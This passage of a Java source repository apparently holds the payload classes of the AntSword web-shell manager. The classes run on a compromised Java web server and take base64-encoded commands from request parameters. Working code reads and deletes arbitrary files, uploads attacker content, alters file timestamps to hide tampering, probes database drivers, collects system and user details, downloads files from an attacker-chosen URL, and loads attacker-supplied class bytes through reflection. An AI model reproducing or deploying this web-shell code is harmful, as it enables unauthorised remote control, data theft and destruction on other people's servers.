111 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
112 | } else {
113 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
114 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
115 | }
116 | return bt;
117 | } catch (Exception e) {
118 | return new byte[]{};
119 | }
120 | }
121 | }
122 |
--------------------------------------------------------------------------------
/src/filemanager/Delete.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.Field;
5 |
6 | public class Delete {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkey1 = "antswordargpath";
21 | String varkeydecoder = "antswordargdecoder";
22 |
23 | try {
24 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
25 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
26 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
27 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
28 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
29 | output.append(DeleteFileOrDirCode(z1));
30 | } catch (Exception e) {
31 | output.append("ERROR:// " + e);
32 | }
33 | try {
34 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
35 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
36 | } catch (Exception ignored) {
37 | }
38 | return true;
39 | }
40 |
41 | String decode(String str) throws Exception {
42 | int prefixlen = 0;
43 | try {
44 | prefixlen = Integer.parseInt(randomPrefix);
45 | str = str.substring(prefixlen);
46 | } catch (Exception e) {
47 | prefixlen = 0;
48 | }
49 | if (encoder.equals("base64")) {
50 | return new String(this.Base64DecodeToByte(str), this.cs);
51 | }
52 | return str;
53 | }
54 |
55 | String DeleteFileOrDirCode(String fileOrDirPath) throws Exception {
56 | File f = new File(fileOrDirPath);
57 | if (f.isDirectory()) {
58 | File[] x = f.listFiles();
59 | for (int k = 0; k < x.length; k++) {
60 | if (!x[k].delete()) {
61 | DeleteFileOrDirCode(x[k].getPath());
62 | }
63 | }
64 | }
65 | f.delete();
66 | return "1";
67 | }
68 |
69 | public void parseObj(Object obj) {
70 | if (obj.getClass().isArray()) {
71 | Object[] data = (Object[]) obj;
72 | request = data[0];
73 | response = data[1];
74 | } else {
75 | try {
76 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
77 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
78 | } catch (Exception e) {
79 | request = obj;
80 | try {
81 | Field req = request.getClass().getDeclaredField("request");
82 | req.setAccessible(true);
83 | Object request2 = req.get(request);
84 | Field resp = request2.getClass().getDeclaredField("response");
85 | resp.setAccessible(true);
86 | response = resp.get(request2);
87 | } catch (Exception ex) {
88 | try {
89 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
90 | } catch (Exception ignored) {
91 |
92 | }
93 | }
94 | }
95 | }
96 | }
97 |
98 | public String asoutput(String str) {
99 | try {
100 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
101 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
102 | defineClassMethod.setAccessible(true);
103 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
104 | return cc.getConstructor(String.class).newInstance(str).toString();
105 | } catch (Exception e) {
106 | return str;
107 | }
108 | }
109 |
110 | public byte[] Base64DecodeToByte(String str) {
111 | byte[] bt = null;
112 | String version = System.getProperty("java.version");
113 | try {
114 | if (version.compareTo("1.9") >= 0) {
115 | Class clazz = Class.forName("java.util.Base64");
116 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
117 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
118 | } else {
119 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
120 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
121 | }
122 | return bt;
123 | } catch (Exception e) {
124 | return new byte[]{};
125 | }
126 | }
127 | }
128 |
--------------------------------------------------------------------------------
/src/filemanager/Read_file.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.BufferedReader;
4 | import java.io.File;
5 | import java.io.FileInputStream;
6 | import java.io.InputStreamReader;
7 | import java.lang.reflect.Field;
8 |
9 | public class Read_file {
10 | public Object request = null;
11 | public Object response = null;
12 | public String encoder = "base64";
13 | public String cs = "antswordCharset";
14 | public String randomPrefix = "antswordrandomPrefix";
15 | public String decoderClassdata;
16 |
17 | @Override
18 | public boolean equals(Object obj) {
19 | this.parseObj(obj);
20 | StringBuffer output = new StringBuffer();
21 | String tag_s = "->|";
22 | String tag_e = "|<-";
23 | String varkey1 = "antswordargpath";
24 | String varkeydecoder = "antswordargdecoder";
25 |
26 | try {
27 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
28 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
29 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
30 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
31 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
32 | output.append(ReadFileCode(z1));
33 | } catch (Exception e) {
34 |
35 | output.append("ERROR:// " + e);
36 |
37 | }
38 | try {
39 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
40 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
41 | } catch (Exception ignored) {
42 | }
43 | return true;
44 | }
45 |
46 | String decode(String str) throws Exception {
47 | int prefixlen = 0;
48 | try {
49 | prefixlen = Integer.parseInt(randomPrefix);
50 | str = str.substring(prefixlen);
51 | } catch (Exception e) {
52 | prefixlen = 0;
53 | }
54 | if (encoder.equals("base64")) {
55 | return new String(this.Base64DecodeToByte(str), this.cs);
56 | }
57 | return str;
58 | }
59 |
60 | String ReadFileCode(String filePath) throws Exception {
61 | String l = "", s = "";
62 | BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(filePath)), cs));
63 | while ((l = br.readLine()) != null) {
64 | s += l + "\r\n";
65 | }
66 | br.close();
67 | return s;
68 | }
69 |
70 | public void parseObj(Object obj) {
71 | if (obj.getClass().isArray()) {
72 | Object[] data = (Object[]) obj;
73 | request = data[0];
74 | response = data[1];
75 | } else {
76 | try {
77 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
78 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
79 | } catch (Exception e) {
80 | request = obj;
81 | try {
82 | Field req = request.getClass().getDeclaredField("request");
83 | req.setAccessible(true);
84 | Object request2 = req.get(request);
85 | Field resp = request2.getClass().getDeclaredField("response");
86 | resp.setAccessible(true);
87 | response = resp.get(request2);
88 | } catch (Exception ex) {
89 | try {
90 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
91 | } catch (Exception ignored) {
92 |
93 | }
94 | }
95 | }
96 | }
97 | }
98 |
99 | public String asoutput(String str) {
100 | try {
101 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
102 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
103 | defineClassMethod.setAccessible(true);
104 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
105 | return cc.getConstructor(String.class).newInstance(str).toString();
106 | } catch (Exception e) {
107 | return str;
108 | }
109 | }
110 |
111 | public byte[] Base64DecodeToByte(String str) {
112 | byte[] bt = null;
113 | String version = System.getProperty("java.version");
114 | try {
115 | if (version.compareTo("1.9") >= 0) {
116 | Class clazz = Class.forName("java.util.Base64");
117 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
118 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
119 | } else {
120 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
121 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
122 | }
123 | return bt;
124 | } catch (Exception e) {
125 | return new byte[]{};
126 | }
127 | }
128 | }
129 |
--------------------------------------------------------------------------------
/src/filemanager/Retime.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.Field;
5 | import java.text.SimpleDateFormat;
6 |
7 | public class Retime {
8 | public Object request = null;
9 | public Object response = null;
10 | public String encoder = "base64";
11 | public String cs = "antswordCharset";
12 | public String randomPrefix = "antswordrandomPrefix";
13 | public String decoderClassdata;
14 |
15 | @Override
16 | public boolean equals(Object obj) {
17 | this.parseObj(obj);
18 | StringBuffer output = new StringBuffer();
19 | String tag_s = "->|";
20 | String tag_e = "|<-";
21 | String varkey1 = "antswordargpath";
22 | String varkey2 = "antswordargtime";
23 | String varkeydecoder = "antswordargdecoder";
24 |
25 | try {
26 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
27 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
28 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
29 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
30 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
31 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
32 | output.append(ModifyFileOrDirTimeCode(z1, z2));
33 | } catch (Exception e) {
34 | output.append("ERROR:// " + e);
35 | }
36 | try {
37 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
38 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
39 | } catch (Exception ignored) {
40 | }
41 | return true;
42 | }
43 |
44 | String decode(String str) throws Exception {
45 | int prefixlen = 0;
46 | try {
47 | prefixlen = Integer.parseInt(randomPrefix);
48 | str = str.substring(prefixlen);
49 | } catch (Exception e) {
50 | prefixlen = 0;
51 | }
52 | if (encoder.equals("base64")) {
53 | return new String(this.Base64DecodeToByte(str), this.cs);
54 | }
55 | return str;
56 | }
57 |
58 | String ModifyFileOrDirTimeCode(String fileOrDirPath, String aTime) throws Exception {
59 | File f = new File(fileOrDirPath);
60 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
61 | java.util.Date dt = fm.parse(aTime);
62 | f.setLastModified(dt.getTime());
63 | return "1";
64 | }
65 |
66 | public void parseObj(Object obj) {
67 | if (obj.getClass().isArray()) {
68 | Object[] data = (Object[]) obj;
69 | request = data[0];
70 | response = data[1];
71 | } else {
72 | try {
73 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
74 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
75 | } catch (Exception e) {
76 | request = obj;
77 | try {
78 | Field req = request.getClass().getDeclaredField("request");
79 | req.setAccessible(true);
80 | Object request2 = req.get(request);
81 | Field resp = request2.getClass().getDeclaredField("response");
82 | resp.setAccessible(true);
83 | response = resp.get(request2);
84 | } catch (Exception ex) {
85 | try {
86 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
87 | } catch (Exception ignored) {
88 |
89 | }
90 | }
91 | }
92 | }
93 | }
94 |
95 | public String asoutput(String str) {
96 | try {
97 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
98 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
99 | defineClassMethod.setAccessible(true);
100 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
101 | return cc.getConstructor(String.class).newInstance(str).toString();
102 | } catch (Exception e) {
103 | return str;
104 | }
105 | }
106 |
107 | public byte[] Base64DecodeToByte(String str) {
108 | byte[] bt = null;
109 | String version = System.getProperty("java.version");
110 | try {
111 | if (version.compareTo("1.9") >= 0) {
112 | Class clazz = Class.forName("java.util.Base64");
113 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
114 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
115 | } else {
116 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
117 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
118 | }
119 | return bt;
120 | } catch (Exception e) {
121 | return new byte[]{};
122 | }
123 | }
124 | }
125 |
--------------------------------------------------------------------------------
/src/base/Probedb.java:
--------------------------------------------------------------------------------
1 | package base;
2 |
3 | import java.lang.reflect.Field;
4 |
5 | public class Probedb {
6 | public Object request = null;
7 | public Object response = null;
8 | public String encoder = "base64";
9 | public String cs = "antswordCharset";
10 | public String randomPrefix = "antswordrandomPrefix";
11 | public String decoderClassdata;
12 |
13 | @Override
14 | public boolean equals(Object obj) {
15 | this.parseObj(obj);
16 | StringBuffer output = new StringBuffer();
17 | String tag_s = "->|";
18 | String tag_e = "|<-";
19 | String varkeydecoder = "antswordargdecoder";
20 | try {
21 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
22 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
23 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
24 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
25 | output.append(ProbedbCode());
26 | } catch (Exception e) {
27 | output.append("ERROR:// " + e);
28 | }
29 | try {
30 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
31 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
32 | } catch (Exception ignored) {
33 | }
34 | return true;
35 | }
36 |
37 | String ProbedbCode() {
38 | String[] drivers = new String[]{
39 | "com.mysql.jdbc.Driver",
40 | "com.mysql.cj.jdbc.Driver",
41 | "oracle.jdbc.driver.OracleDriver",
42 | "org.postgresql.Driver",
43 | "weblogic.jdbc.mssqlserver4.Driver",
44 | "com.microsoft.sqlserver.jdbc.SQLServerDriver",
45 | "com.inet.pool.PoolDriver",
46 | };
47 | String ret = "";
48 | for (int i = 0; i < drivers.length; i++) {
49 | try {
50 | Class.forName(drivers[i]);
51 | ret += drivers[i] + "\t1\n";
52 | } catch (Exception e) {
53 | ret += drivers[i] + "\t0\n";
54 | }
55 | }
56 | return ret;
57 | }
58 |
59 | public void parseObj(Object obj) {
60 | if (obj.getClass().isArray()) {
61 | Object[] data = (Object[]) obj;
62 | request = data[0];
63 | response = data[1];
64 | } else {
65 | try {
66 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
67 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
68 | } catch (Exception e) {
69 | request = obj;
70 | try {
71 | Field req = request.getClass().getDeclaredField("request");
72 | req.setAccessible(true);
73 | Object request2 = req.get(request);
74 | Field resp = request2.getClass().getDeclaredField("response");
75 | resp.setAccessible(true);
76 | response = resp.get(request2);
77 | } catch (Exception ex) {
78 | try {
79 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
80 | } catch (Exception ignored) {
81 |
82 | }
83 | }
84 | }
85 | }
86 | }
87 |
88 | public String asoutput(String str) {
89 | try {
90 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
91 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
92 | defineClassMethod.setAccessible(true);
93 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
94 | return cc.getConstructor(String.class).newInstance(str).toString();
95 | } catch (Exception e) {
96 | return str;
97 | }
98 | }
99 |
100 | String decode(String str) throws Exception {
101 | int prefixlen = 0;
102 | try {
103 | prefixlen = Integer.parseInt(randomPrefix);
104 | str = str.substring(prefixlen);
105 | } catch (Exception e) {
106 | prefixlen = 0;
107 | }
108 | if (encoder.equals("base64")) {
109 | return new String(this.Base64DecodeToByte(str), this.cs);
110 | }
111 | return str;
112 | }
113 |
114 | public byte[] Base64DecodeToByte(String str) {
115 | byte[] bt = null;
116 | String version = System.getProperty("java.version");
117 | try {
118 | if (version.compareTo("1.9") >= 0) {
119 | Class clazz = Class.forName("java.util.Base64");
120 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
121 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
122 | } else {
123 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
124 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
125 | }
126 | return bt;
127 | } catch (Exception e) {
128 | return new byte[]{};
129 | }
130 | }
131 | }
132 |
--------------------------------------------------------------------------------
/src/base/Info.java:
--------------------------------------------------------------------------------
1 | package base;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.Field;
5 |
6 | public class Info {
7 | public Object request = null;
8 | public Object response = null;
9 | public String encoder = "base64";
10 | public String cs = "antswordCharset";
11 | public String randomPrefix = "antswordrandomPrefix";
12 | public String decoderClassdata;
13 |
14 | @Override
15 | public boolean equals(Object obj) {
16 | this.parseObj(obj);
17 | StringBuffer output = new StringBuffer();
18 | String tag_s = "->|";
19 | String tag_e = "|<-";
20 | String varkeydecoder = "antswordargdecoder";
21 | try {
22 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
23 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
24 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
25 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
26 | output.append(SysInfoCode());
27 | } catch (Exception e) {
28 | output.append("ERROR:// " + e);
29 | }
30 | try {
31 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
32 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
33 | } catch (Exception ignored) {
34 | }
35 | return true;
36 | }
37 |
38 | String SysInfoCode() {
39 | String d = System.getProperty("user.dir");
40 | String serverInfo = System.getProperty("os.name");
41 | String user = System.getProperty("user.name");
42 | String driverlist = this.WwwRootPathCode(d);
43 | return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
44 | }
45 |
46 | String WwwRootPathCode(String d) {
47 | StringBuilder s = new StringBuilder();
48 | if (!d.startsWith("/")) {
49 | try {
50 | File[] roots = File.listRoots();
51 | for (File root : roots) {
52 | s.append(root.toString(), 0, 2);
53 | }
54 | } catch (Exception e) {
55 | s.append("/");
56 | }
57 | } else {
58 | s.append("/");
59 | }
60 | return s.toString();
61 | }
62 |
63 | public void parseObj(Object obj) {
64 | if (obj.getClass().isArray()) {
65 | Object[] data = (Object[]) obj;
66 | request = data[0];
67 | response = data[1];
68 | } else {
69 | try {
70 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
71 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
72 | } catch (Exception e) {
73 | request = obj;
74 | try {
75 | Field req = request.getClass().getDeclaredField("request");
76 | req.setAccessible(true);
77 | Object request2 = req.get(request);
78 | Field resp = request2.getClass().getDeclaredField("response");
79 | resp.setAccessible(true);
80 | response = resp.get(request2);
81 | } catch (Exception ex) {
82 | try {
83 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
84 | } catch (Exception ignored) {
85 |
86 | }
87 | }
88 | }
89 | }
90 | }
91 |
92 | public String asoutput(String str) {
93 | try {
94 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
95 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
96 | defineClassMethod.setAccessible(true);
97 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
98 | return cc.getConstructor(String.class).newInstance(str).toString();
99 | } catch (Exception e) {
100 | return str;
101 | }
102 | }
103 |
104 | String decode(String str) throws Exception {
105 | int prefixlen = 0;
106 | try {
107 | prefixlen = Integer.parseInt(randomPrefix);
108 | str = str.substring(prefixlen);
109 | } catch (Exception e) {
110 | prefixlen = 0;
111 | }
112 | if (encoder.equals("base64")) {
113 | return new String(this.Base64DecodeToByte(str), this.cs);
114 | }
115 | return str;
116 | }
117 |
118 | public byte[] Base64DecodeToByte(String str) {
119 | byte[] bt = null;
120 | String version = System.getProperty("java.version");
121 | try {
122 | if (version.compareTo("1.9") >= 0) {
123 | Class clazz = Class.forName("java.util.Base64");
124 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
125 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
126 | } else {
127 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
128 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
129 | }
130 | return bt;
131 | } catch (Exception e) {
132 | return new byte[]{};
133 | }
134 | }
135 | }
136 |
--------------------------------------------------------------------------------
/src/filemanager/Upload_file.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.File;
4 | import java.io.FileOutputStream;
5 | import java.lang.reflect.Field;
6 |
7 | public class Upload_file {
8 | public Object request = null;
9 | public Object response = null;
10 | public String encoder = "base64";
11 | public String cs = "antswordCharset";
12 | public String randomPrefix = "antswordrandomPrefix";
13 | public String decoderClassdata;
14 |
15 | @Override
16 | public boolean equals(Object obj) {
17 | this.parseObj(obj);
18 | StringBuffer output = new StringBuffer();
19 |
20 | String tag_s = "->|";
21 | String tag_e = "|<-";
22 | String varkey1 = "antswordargpath";
23 | String varkey2 = "antswordargcontent";
24 | String varkeydecoder = "antswordargdecoder";
25 |
26 | try {
27 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
28 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
29 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
30 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
31 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
32 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
33 | output.append(UploadFileCode(z1, z2));
34 | } catch (Exception e) {
35 | output.append("ERROR:// " + e);
36 | }
37 | try {
38 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
39 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
40 | } catch (Exception ignored) {
41 | }
42 | return true;
43 | }
44 |
45 | String decode(String str) throws Exception {
46 | int prefixlen = 0;
47 | try {
48 | prefixlen = Integer.parseInt(randomPrefix);
49 | str = str.substring(prefixlen);
50 | } catch (Exception e) {
51 | prefixlen = 0;
52 | }
53 | if (encoder.equals("base64")) {
54 | return new String(this.Base64DecodeToByte(str), this.cs);
55 | }
56 | return str;
57 | }
58 |
59 | String UploadFileCode(String savefilePath, String fileHexContext) throws Exception {
60 | String h = "0123456789ABCDEF";
61 | File f = new File(savefilePath);
62 | f.createNewFile();
63 | FileOutputStream os = new FileOutputStream(f, true);
64 | for (int i = 0; i < fileHexContext.length(); i += 2) {
65 | os.write((h.indexOf(fileHexContext.charAt(i)) << 4 | h.indexOf(fileHexContext.charAt(i + 1))));
66 | }
67 | os.close();
68 | return "1";
69 | }
70 |
71 | public void parseObj(Object obj) {
72 | if (obj.getClass().isArray()) {
73 | Object[] data = (Object[]) obj;
74 | request = data[0];
75 | response = data[1];
76 | } else {
77 | try {
78 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
79 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
80 | } catch (Exception e) {
81 | request = obj;
82 | try {
83 | Field req = request.getClass().getDeclaredField("request");
84 | req.setAccessible(true);
85 | Object request2 = req.get(request);
86 | Field resp = request2.getClass().getDeclaredField("response");
87 | resp.setAccessible(true);
88 | response = resp.get(request2);
89 | } catch (Exception ex) {
90 | try {
91 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
92 | } catch (Exception ignored) {
93 |
94 | }
95 | }
96 | }
97 | }
98 | }
99 |
100 | public String asoutput(String str) {
101 | try {
102 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
103 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
104 | defineClassMethod.setAccessible(true);
105 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
106 | return cc.getConstructor(String.class).newInstance(str).toString();
107 | } catch (Exception e) {
108 | return str;
109 | }
110 | }
111 |
112 | public byte[] Base64DecodeToByte(String str) {
113 | byte[] bt = null;
114 | String version = System.getProperty("java.version");
115 | try {
116 | if (version.compareTo("1.9") >= 0) {
117 | Class clazz = Class.forName("java.util.Base64");
118 | Object decoder = clazz.getMethod("getDecoder").invoke(null);
119 | bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
120 | } else {
121 | Class clazz = Class.forName("sun.misc.BASE64Decoder");
122 | bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
123 | }
124 | return bt;
125 | } catch (Exception e) {
126 | return new byte[]{};
127 | }
128 | }
129 | }
130 |
--------------------------------------------------------------------------------
/src/filemanager/Wget.java:
--------------------------------------------------------------------------------
1 | package filemanager;
2 |
3 | import java.io.FileOutputStream;
4 | import java.io.InputStream;
5 | import java.lang.reflect.Field;
6 | import java.net.HttpURLConnection;
7 | import java.net.URL;
8 |
9 | public class Wget {
10 | public Object request = null;
11 | public Object response = null;
12 | public String encoder = "base64";
13 | public String cs = "antswordCharset";
14 | public String randomPrefix = "antswordrandomPrefix";
15 | public String decoderClassdata;
16 |
17 | @Override
18 | public boolean equals(Object obj) {
19 | this.parseObj(obj);
20 | StringBuffer output = new StringBuffer();
21 | String tag_s = "->|";
22 | String tag_e = "|<-";
23 | String varkey1 = "antswordargurl";
24 | String varkey2 = "antswordargpath";
25 | String varkeydecoder = "antswordargdecoder";
26 |
27 | try {
28 | response.getClass().getMethod("setContentType", String.class).invoke(response, "text/html");
29 | request.getClass().getMethod("setCharacterEncoding", String.class).invoke(request, cs);
30 | response.getClass().getMethod("setCharacterEncoding", String.class).invoke(response, cs);
31 | String z1 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey1));
32 | String z2 = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkey2));
33 | this.decoderClassdata = decode((String) request.getClass().getMethod("getParameter", String.class).invoke(request, varkeydecoder));
34 | output.append(WgetCode(z1, z2));
35 | } catch (Exception e) {
36 | output.append("ERROR:// " + e);
37 | }
38 | try {
39 | Object writer = response.getClass().getMethod("getWriter").invoke(response);
40 | writer.getClass().getMethod("print", String.class).invoke(writer, tag_s + this.asoutput(output.toString()) + tag_e);
41 | } catch (Exception ignored) {
42 | }
43 | return true;
44 | }
45 |
46 | String decode(String str) throws Exception {
47 | int prefixlen = 0;
48 | try {
49 | prefixlen = Integer.parseInt(randomPrefix);
50 | str = str.substring(prefixlen);
51 | } catch (Exception e) {
52 | prefixlen = 0;
53 | }
54 | if (encoder.equals("base64")) {
55 | return new String(this.Base64DecodeToByte(str), this.cs);
56 | }
57 | return str;
58 | }
59 |
60 | String WgetCode(String urlPath, String saveFilePath) throws Exception {
61 | URL u = new URL(urlPath);
62 | int n = 0;
63 | FileOutputStream os = new FileOutputStream(saveFilePath);
64 | HttpURLConnection h = (HttpURLConnection) u.openConnection();
65 | InputStream is = h.getInputStream();
66 | byte[] b = new byte[512];
67 | while ((n = is.read(b)) != -1) {
68 | os.write(b, 0, n);
69 | }
70 | os.close();
71 | is.close();
72 | h.disconnect();
73 | return "1";
74 | }
75 |
76 | public void parseObj(Object obj) {
77 | if (obj.getClass().isArray()) {
78 | Object[] data = (Object[]) obj;
79 | request = data[0];
80 | response = data[1];
81 | } else {
82 | try {
83 | request = obj.getClass().getDeclaredMethod("getRequest").invoke(obj);
84 | response = obj.getClass().getDeclaredMethod("getResponse").invoke(obj);
85 | } catch (Exception e) {
86 | request = obj;
87 | try {
88 | Field req = request.getClass().getDeclaredField("request");
89 | req.setAccessible(true);
90 | Object request2 = req.get(request);
91 | Field resp = request2.getClass().getDeclaredField("response");
92 | resp.setAccessible(true);
93 | response = resp.get(request2);
94 | } catch (Exception ex) {
95 | try {
96 | response = request.getClass().getDeclaredMethod("getResponse").invoke(obj);
97 | } catch (Exception ignored) {
98 |
99 | }
100 | }
101 | }
102 | }
103 | }
104 |
105 | public String asoutput(String str) {
106 | try {
107 | byte[] classBytes = Base64DecodeToByte(decoderClassdata);
108 | java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
109 | defineClassMethod.setAccessible(true);
110 | Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length);
111 | return cc.getConstructor(String.class).newInstance(str).toString();
112 | } catch (Exception e) {
113 | return str;
114 | }
115 | }
116 |
117 | public byte[] Base64DecodeToByte(String str) {
118 | byte[] bt = null;
119 | String version = System.getProperty("java.version");
120 | try {
121 | if (version.compareTo("1.9") >= 0) {
